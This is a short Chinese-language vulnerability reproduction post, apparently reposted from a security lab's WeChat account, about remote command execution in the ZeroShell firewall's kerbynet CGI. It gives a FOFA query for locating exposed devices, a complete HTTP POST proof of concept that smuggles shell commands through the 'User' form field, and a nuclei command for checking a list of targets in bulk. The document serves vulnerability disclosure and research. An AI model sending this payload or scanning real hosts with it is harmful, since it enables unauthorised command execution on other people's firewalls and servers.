0x01 阅读须知
本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 漏洞描述
Zeroshell是一个微型的linux发行版本,它功能强大,具有强大的router、radius、web门户、防火墙、virtual、Qos、DHCP、dns转发等功能,可以用来安装到服务器上为内网提供网络服务。Zeroshell防火墙统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限。
0x03 漏洞复现
fofa:app="Zeroshell-防火墙"
1.使用POC执行id命令,得到回显
POST /cgi-bin/kerbynet HTTP/1.1Host:User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)Content-Length: 365Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brConnection: Keep-aliveContent-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw------------YWJkMTQzNDcwContent-Disposition: form-data; name="Action"StartSessionSubmit------------YWJkMTQzNDcwContent-Disposition: form-data; name="User"echo bgcafo$() baghqnnz^xyu||a #' &echo 12345948~||a #|" &echo bgcafo$() baghqnnz^xyu||a #------------YWJkMTQzNDcwContent-Disposition: form-data; name="PW"------------YWJkMTQzNDcw--
2.nuclei批量验证已发表于知识星球
nuclei.exe -t zeroshell-fw-kerbynet-rce.yaml -l subs.txt -stats
原文始发于微信公众号(融云攻防实验室):【新】漏洞复现 ZeroShell kerbynet存在远程命令执行漏洞(另一种方式)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论